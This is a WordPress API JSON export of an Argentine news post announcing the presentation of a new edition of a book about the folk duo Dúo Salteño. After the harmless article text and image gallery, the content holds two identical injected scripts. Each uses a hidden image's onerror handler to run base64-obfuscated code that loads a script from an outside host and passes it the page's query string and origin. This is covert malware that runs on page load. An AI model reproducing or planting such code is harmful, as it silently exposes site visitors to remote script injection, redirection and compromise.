{"id":4883,"date":"2025-02-25T11:25:39","date_gmt":"2025-02-25T14:25:39","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4883"},"modified":"2025-08-13T23:39:52","modified_gmt":"2025-08-14T02:39:52","slug":"duo-salteno-memorias-de-largos-caminos-presentan-una-nueva-edicion-del-libro-homenaje","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4883","title":{"rendered":"D\u00fao Salte\u00f1o: Memorias de largos caminos, presentan una nueva edici\u00f3n del libro homenaje"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\"><strong><em>La segunda edici\u00f3n del libro que recorre las memorias y trayectoria del grupo folkl\u00f3rico D\u00fao Salte\u00f1o ser\u00e1 presentada en la Usina Cultural de Salta el 28 de febrero.<\/em><\/strong><\/h3>\n\n\n\n<p>El pr\u00f3ximo viernes 28 de febrero a las 20 horas, en el Sal\u00f3n de Usos M\u00faltiples de la Usina Cultural de Salta, se presentar\u00e1 la segunda edici\u00f3n del libro \u201cD\u00fao Salte\u00f1o: Memorias de largos caminos\u201d. Esta obra, escrita por Ana Falc\u00f3n y Lucas J. Fern\u00e1ndez, recorre la trayectoria de uno de los d\u00faos m\u00e1s emblem\u00e1ticos del folclore argentino.&nbsp;<\/p>\n\n\n\n<p>El evento contar\u00e1 con la moderaci\u00f3n de In\u00e9s Galindez y la participaci\u00f3n de los presentadores Irene L\u00f3pez y Hugo Esp\u00edndola. La publicaci\u00f3n, realizada por Mand\u00edbula Editorial, Serici Editorial y Amalaya, busca mantener viva la memoria de este d\u00fao que marc\u00f3 un hito en la m\u00fasica popular.&nbsp;<\/p>\n\n\n\n<p>La presentaci\u00f3n es auspiciada por la Secretar\u00eda de Cultura del Gobierno de Salta y ofrecer\u00e1 un espacio de di\u00e1logo y reflexi\u00f3n sobre el legado del D\u00fao Salte\u00f1o, invitando al p\u00fablico a conocer m\u00e1s sobre su historia y su impacto en la cultura del pa\u00eds.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"4884\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/02\/10752-duo-saltenio-memorias-de-largos-caminos-presentan-una-nueva-edicion-del-libro-homenaje-1024x576.webp\" alt=\"\" class=\"wp-image-4884\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/02\/10752-duo-saltenio-memorias-de-largos-caminos-presentan-una-nueva-edicion-del-libro-homenaje-1024x576.webp 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/02\/10752-duo-saltenio-memorias-de-largos-caminos-presentan-una-nueva-edicion-del-libro-homenaje-300x169.webp 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/02\/10752-duo-saltenio-memorias-de-largos-caminos-presentan-una-nueva-edicion-del-libro-homenaje-768x432.webp 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/02\/10752-duo-saltenio-memorias-de-largos-caminos-presentan-una-nueva-edicion-del-libro-homenaje-746x420.webp 746w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/02\/10752-duo-saltenio-memorias-de-largos-caminos-presentan-una-nueva-edicion-del-libro-homenaje-696x392.webp 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/02\/10752-duo-saltenio-memorias-de-largos-caminos-presentan-una-nueva-edicion-del-libro-homenaje.webp 1066w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"560\" height=\"315\" data-id=\"4885\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/02\/100248-duo-saltenio-memorias-de-largos-caminos-presentan-una-nueva-edicion-del-libro-homenaje.webp\" alt=\"\" class=\"wp-image-4885\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/02\/100248-duo-saltenio-memorias-de-largos-caminos-presentan-una-nueva-edicion-del-libro-homenaje.webp 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/02\/100248-duo-saltenio-memorias-de-largos-caminos-presentan-una-nueva-edicion-del-libro-homenaje-300x169.webp 300w\" sizes=\"(max-width: 560px) 100vw, 560px\" \/><\/figure>\n<\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La segunda edici\u00f3n del libro que recorre las memorias y trayectoria del grupo folkl\u00f3rico D\u00fao Salte\u00f1o ser\u00e1 presentada en la Usina Cultural de Salta el 28 de febrero. El pr\u00f3ximo viernes 28 de febrero a las 20 horas, en el Sal\u00f3n de Usos M\u00faltiples de la Usina Cultural de Salta, se presentar\u00e1 la segunda edici\u00f3n [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4885,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,15],"tags":[],"class_list":{"0":"post-4883","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4883"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4883"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4883\/revisions"}],"predecessor-version":[{"id":6562,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4883\/revisions\/6562"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4885"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4883"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4883"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4883"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}